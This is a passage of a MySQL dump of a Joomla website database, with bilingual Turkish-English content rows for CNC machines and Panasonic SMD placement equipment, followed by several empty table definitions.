ekonomik CNC makinelerinin &uuml;retimine başlamış bulunmaktayız. Makine boyutları 750x750mm\'den 1500x1500mm\'e kadar değişmektedir. Uygulama olarak PCB kazıma, strafor kesme, ahşap işleme, polikarbon ve akrilik kesme, aluminyum işleme olarak geniş bir yelpazeyi kapsamaktadır. Makineler, &uuml;retime direkt olarak hazır \"plug&amp;play\" &ouml;zellikleri ile gelmekte olup, temel bir eğitim sonrası hızlı bir şekilde işletmenizde devreye alınabilir. Sizleri daha fazla bilgi ve makinelerimizi g&ouml;rmeniz i&ccedil;in Showroom\'umuza davet etmekteyiz...</p>','',0,80,'2014-08-04 06:47:14',676,'','2019-09-17 06:43:51',676,0,'0000-00-00 00:00:00','2014-08-04 06:47:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,1,'','',1,22989,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'tr-TR','',''),(95,234,'Ahşap İşleme / Wood processing','ahşap-işleme-wood-processing','<h2>MDF İşleme</h2>\r\n<h2>Wood (MDF) Processing</h2>\r\n<p style=\"font-size: 12.012px;\">{mp4}cnc/video/mdf-1{/mp4}</p>','',1,86,'2019-09-16 16:04:17',676,'','2020-02-11 14:53:07',676,0,'0000-00-00 00:00:00','2019-09-16 16:04:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,4,'','',1,4962,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(96,235,'Akrilik İşleme / Acrylic Processing','akrilik-işleme-acrylic-processing','<h2>Akrilik İşleme</h2>\r\n<h2>Acrylic Processing</h2>\r\n<p style=\"font-size: 12.012px;\">{mp4}cnc/video/acrylic-cut-1{/mp4}</p>','',1,86,'2019-09-16 16:04:17',676,'','2020-02-11 15:05:09',676,0,'0000-00-00 00:00:00','2019-09-16 16:04:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,3,'','',1,3683,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(97,236,'Akrilik Oyma / Acrylic Engraving','akrilik-oyma-acrylic-engraving','<h2>Akrilik İşleme</h2>\r\n<h2>Acrylic Processing</h2>\r\n<p style=\"font-size: 12.012px;\">{mp4}cnc/video/acrylic-sign-piano{/mp4}</p>','',1,86,'2019-09-16 16:04:17',676,'','2020-02-11 15:06:36',676,0,'0000-00-00 00:00:00','2019-09-16 16:04:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,2,'','',1,3857,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(98,237,'Aluminyum işleme / Aluminum processing','akrilik-oyma-acrylic-engraving-2','<h2>Akrilik İşleme</h2>\r\n<h2>Acrylic Processing</h2>\r\n<p style=\"font-size: 12.012px;\">{mp4}cnc/video/alu-1{/mp4}</p>','',1,86,'2019-09-16 16:04:17',676,'','2020-02-11 15:09:49',676,0,'0000-00-00 00:00:00','2019-09-16 16:04:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,1,'','',1,3662,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(99,238,'Ahşap İşleme / Wood processing (120cm)','ahşap-işleme-wood-processing-2','<h2>MDF İşleme</h2>\r\n<h2>Wood (MDF) Processing</h2>\r\n<p style=\"font-size: 12.012px;\">{mp4}cnc/video/mdf-2{/mp4}</p>','',1,86,'2019-09-16 16:04:17',676,'','2020-02-11 15:14:56',676,676,'2020-11-21 18:33:02','2019-09-16 16:04:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,'','',1,6519,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(100,241,'Panasonic-Overview','panasonic-overview','<h1 style=\"text-align: center;\"><span style=\"color: #333399;\"><strong>Panasonic Teknolojisi</strong></span></h1>\r\n<table>\r\n<tbody>\r\n<tr style=\"text-align: center;\">\r\n<td colspan=\"3\">\r\n<p><a href=\"tr/%C3%BCr%C3%BCnler/smd-orta-h%C4%B1zl%C4%B1/am100-detail\"><img src=\"images/panasonic/AM100.jpg\" alt=\"\" width=\"300\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></a></p>\r\n<p>&nbsp; AM100 - SMD Dizgi Makinesi&nbsp;</p>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td>\r\n<p><a href=\"tr/%C3%BCr%C3%BCnler/smd-ultra-h%C4%B1z/npm-d3a-detail\"><img src=\"images/panasonic/NPM-D3-front.png\" alt=\"\" height=\"180\" /></a></p>\r\n<p>NPM-D3A - Ultra-Hızlı SMD Dizgi Makinesi</p>\r\n</td>\r\n<td>\r\n<p><a href=\"tr/%C3%BCr%C3%BCnler/smd-ultra-h%C4%B1z/npm-w2s-detail\"><img src=\"images/panasonic/NPM-W2-W2S-front.png\" alt=\"\" height=\"180\" /></a></p>\r\n<p>NPM-W2S - Ultra-Hızlı SMD Dizgi Makinesi</p>\r\n</td>\r\n<td>\r\n<p><a href=\"tr/%C3%BCr%C3%BCnler/smd-ultra-h%C4%B1z/npm-w2-detail\"><img src=\"images/panasonic/NPM-W2.png\" alt=\"\" height=\"180\" /></a></p>\r\n<p>NPM-W2 - Ultra-Hızlı SMD Dizgi Makinesi</p>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td>\r\n<p><a href=\"tr/%C3%BCr%C3%BCnler/screen-printer/spg-detail\"><img src=\"images/panasonic/SPG-front.png\" alt=\"\" height=\"200\" /></a></p>\r\n<p>SPG - Krem Lehim Baskı Makinesi</p>\r\n</td>\r\n<td>\r\n<p><a href=\"images/brochures/spv_en_20_0101_0.pdf\"><img src=\"images/panasonic/SPV.png\" alt=\"\" height=\"200\" /></a></p>\r\n<p>SPV - Krem Lehim Baskı Makinesi</p>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\">\r\n<p style=\"text-align: center;\"><a href=\"tr/%C3%BCr%C3%BCnler/lazer-markalama/lps-c-detail\"><img src=\"images/panasonic/LPS-C-front.png\" alt=\"\" width=\"200\" /></a></p>\r\n<p style=\"text-align: center;\">&nbsp;LPS-C - Lazer Markalama Makinesi</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p><a href=\"tr/%C3%BCr%C3%BCnler/thru-hole/av132-detail\"><img src=\"images/panasonic/av132.jpg\" alt=\"\" height=\"180\" /></a></p>\r\n<p style=\"text-align: center;\">AV132 - Aksiyel Dizgi Makinesi</p>\r\n</td>\r\n<td>\r\n<p>&nbsp;<a href=\"tr/%C3%BCr%C3%BCnler/thru-hole/rl132-detail\"><img src=\"images/panasonic/RL132.jpg\" alt=\"\" height=\"180\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></a></p>\r\n<p style=\"text-align: center;\">RL132 - Radyal Dizgi Makinesi</p>\r\n</td>\r\n<td>\r\n<p>&nbsp;<a href=\"tr/%C3%BCr%C3%BCnler/thru-hole/rg131-detail\"><img src=\"images/panasonic/rg131.png\" alt=\"\" height=\"180\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></a></p>\r\n<p style=\"text-align: center;\">RG131 - Radyal Dizgi Makinesi</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\">\r\n<p><a href=\"tr/%C3%BCr%C3%BCnler/odd-shape-inserter/npm-vf-detail\"><img src=\"images/panasonic/NPM-VF-1.png\" alt=\"\" width=\"200\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></a></p>\r\n<p style=\"text-align: center;\">NPM-VF - Odd-Shape Dizgi Makinesi</p>\r\n&nbsp;&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\">\r\n<p style=\"text-align: center;\">&nbsp;<a href=\"images/brochures/PanaCIM_en_20_0101.pdf\"><img src=\"images/panasonic/panacim-overview.gif\" alt=\"\" width=\"500\" /></a></p>\r\n<p>&nbsp;<img src=\"images/panasonic/panacim-logo.jpg\" alt=\"\" width=\"150\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>','',0,80,'2020-11-25 16:29:09',676,'','2020-11-26 08:57:07',676,0,'0000-00-00 00:00:00','2020-11-25 16:29:09','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',35,2,'','',1,414,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'tr-TR','',''),(101,242,'Panasonic-Overview (2)','panasonic-overview-2','<h1 style=\"text-align: center;\"><span style=\"color: #333399;\"><strong>Panasonic Technology</strong></span></h1>\r\n<table>\r\n<tbody>\r\n<tr style=\"text-align: center;\">\r\n<td colspan=\"3\">\r\n<p><a href=\"en/products-en/smd-orta-h%C4%B1zl%C4%B1/am100-detail\"><img src=\"images/panasonic/AM100.jpg\" alt=\"\" width=\"300\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></a></p>\r\n<p>&nbsp; AM100 - SMD&nbsp;Placement Machine</p>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td>\r\n<p><a href=\"en/products-en/smd-ultra-h%C4%B1z/npm-d3a-1-detail\"><img src=\"images/panasonic/NPM-D3-front.png\" alt=\"\" height=\"180\" /></a></p>\r\n<p>NPM-D3A - Ultra High-Speed SMD</p>\r\n</td>\r\n<td>\r\n<p><a href=\"en/products-en/smd-ultra-h%C4%B1z/npm-w2s-detail\"><img src=\"images/panasonic/NPM-W2-W2S-front.png\" alt=\"\" height=\"180\" /></a></p>\r\n<p>NPM-W2S - Ultra High-Speed SMD</p>\r\n</td>\r\n<td>\r\n<p><a href=\"en/products-en/smd-ultra-h%C4%B1z/npm-detail\"><img src=\"images/panasonic/NPM-W2.png\" alt=\"\" height=\"180\" /></a></p>\r\n<p>NPM-W2 - Ultra High-Speed SMD</p>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td>\r\n<p><a href=\"en/products-en/screen-printer/spg-detail\"><img src=\"images/panasonic/SPG-front.png\" alt=\"\" height=\"200\" /></a></p>\r\n<p>SPG - Screen Printer</p>\r\n</td>\r\n<td>\r\n<p><a href=\"images/brochures/spv_en_20_0101_0.pdf\"><img src=\"images/panasonic/SPV.png\" alt=\"\" height=\"200\" /></a></p>\r\n<p>SPV - Screen Printer</p>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\">\r\n<p style=\"text-align: center;\"><a href=\"en/products-en/laser-marking-machine/lps-c-detail\"><img src=\"images/panasonic/LPS-C-front.png\" alt=\"\" width=\"200\" /></a></p>\r\n<p style=\"text-align: center;\">&nbsp;LPS-C - Lazer Marker</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p><a href=\"en/products-en/thru-hole/av132-detail\"><img src=\"images/panasonic/av132.jpg\" alt=\"\" height=\"180\" /></a></p>\r\n<p style=\"text-align: center;\">AV132 - Axial Machine</p>\r\n</td>\r\n<td>\r\n<p>&nbsp;<a href=\"en/products-en/thru-hole/rl132-detail\"><img src=\"images/panasonic/RL132.jpg\" alt=\"\" height=\"180\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></a></p>\r\n<p style=\"text-align: center;\">RL132 - Radial Machine</p>\r\n</td>\r\n<td>\r\n<p>&nbsp;<a href=\"en/products-en/thru-hole/rg131-detail\"><img src=\"images/panasonic/rg131.png\" alt=\"\" height=\"180\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></a></p>\r\n<p style=\"text-align: center;\">RG131 - Radial Machine</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\">\r\n<p><a href=\"en/products-en/odd-shape-inserter/npm-vf-detail\"><img src=\"images/panasonic/NPM-VF-1.png\" alt=\"\" width=\"200\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></a></p>\r\n<p style=\"text-align: center;\">NPM-VF - Odd-Shape&nbsp;Insertion Machine</p>\r\n&nbsp;&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\">\r\n<p style=\"text-align: center;\">&nbsp;<a href=\"images/brochures/PanaCIM_en_20_0101.pdf\"><img src=\"images/panasonic/panacim-overview.gif\" alt=\"\" width=\"500\" /></a></p>\r\n<p>&nbsp;<img src=\"images/panasonic/panacim-logo.jpg\" alt=\"\" width=\"150\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>','',0,79,'2020-11-25 16:29:09',676,'','2020-11-26 08:57:41',676,0,'0000-00-00 00:00:00','2020-11-25 16:29:09','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',11,0,'','',1,155,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'en-GB','','');
/*!40000 ALTER TABLE `fz6t4_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_content_frontpage`
--

DROP TABLE IF EXISTS `fz6t4_content_frontpage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_content_frontpage` (
  `content_id` int NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_content_frontpage`
--

LOCK TABLES `fz6t4_content_frontpage` WRITE;
/*!40000 ALTER TABLE `fz6t4_content_frontpage` DISABLE KEYS */;
INSERT INTO `fz6t4_content_frontpage` VALUES (80,5),(81,6),(73,7),(82,8),(83,10),(84,11),(86,9),(87,12),(88,4),(94,3),(100,2),(101,1);
/*!40000 ALTER TABLE `fz6t4_content_frontpage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_content_rating`
--

DROP TABLE IF EXISTS `fz6t4_content_rating`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_content_rating` (
  `content_id` int NOT NULL DEFAULT '0',
  `rating_sum` int unsigned NOT NULL DEFAULT '0',
  `rating_count` int unsigned NOT NULL DEFAULT '0',
  `lastip` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_content_rating`
--

LOCK TABLES `fz6t4_content_rating` WRITE;
/*!40000 ALTER TABLE `fz6t4_content_rating` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_content_rating` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_content_types`
--

DROP TABLE IF EXISTS `fz6t4_content_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_content_types` (
  `type_id` int unsigned NOT NULL AUTO_INCREMENT,
  `type_title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `type_alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `table` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `rules` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `field_mappings` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `router` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `content_history_options` varchar(5120) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON string for com_contenthistory options',
  PRIMARY KEY (`type_id`),
  KEY `idx_alias` (`type_alias`(100))
) ENGINE=MyISAM AUTO_INCREMENT=10000 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_content_types`
--

LOCK TABLES `fz6t4_content_types` WRITE;
/*!40000 ALTER TABLE `fz6t4_content_types` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_content_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_contentitem_tag_map`
--

DROP TABLE IF EXISTS `fz6t4_contentitem_tag_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_contentitem_tag_map` (
  `type_alias` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_content_id` int unsigned NOT NULL COMMENT 'PK from the core content table',
  `content_item_id` int NOT NULL COMMENT 'PK from the content type table',
  `tag_id` int unsigned NOT NULL COMMENT 'PK from the tag table',
  `tag_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'Date of most recent save for this tag-item',
  `type_id` mediumint NOT NULL COMMENT 'PK from the content_type table',
  UNIQUE KEY `uc_ItemnameTagid` (`type_id`,`content_item_id`,`tag_id`),
  KEY `idx_tag_type` (`tag_id`,`type_id`),
  KEY `idx_date_id` (`tag_date`,`tag_id`),
  KEY `idx_core_content_id` (`core_content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Maps items from content tables to tags';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_contentitem_tag_map`
--

LOCK TABLES `fz6t4_contentitem_tag_map` WRITE;
/*!40000 ALTER TABLE `fz6t4_contentitem_tag_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_contentitem_tag_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_core_log_searches`
--

DROP TABLE IF EXISTS `fz6t4_core_log_searches`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_core_log_searches` (
  `search_term` varchar(128) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `hits` int unsigned NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_core_log_searches`
--

LOCK TABLES `fz6t4_core_log_searches` WRITE;
/*!40000 ALTER TABLE `fz6t4_core_log_searches` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_core_log_searches` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_djimageslider`
--

DROP TABLE IF EXISTS `fz6t4_djimageslider`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_djimageslider` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `catid` int unsigned NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` varchar(255) NOT NULL,
  `description` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
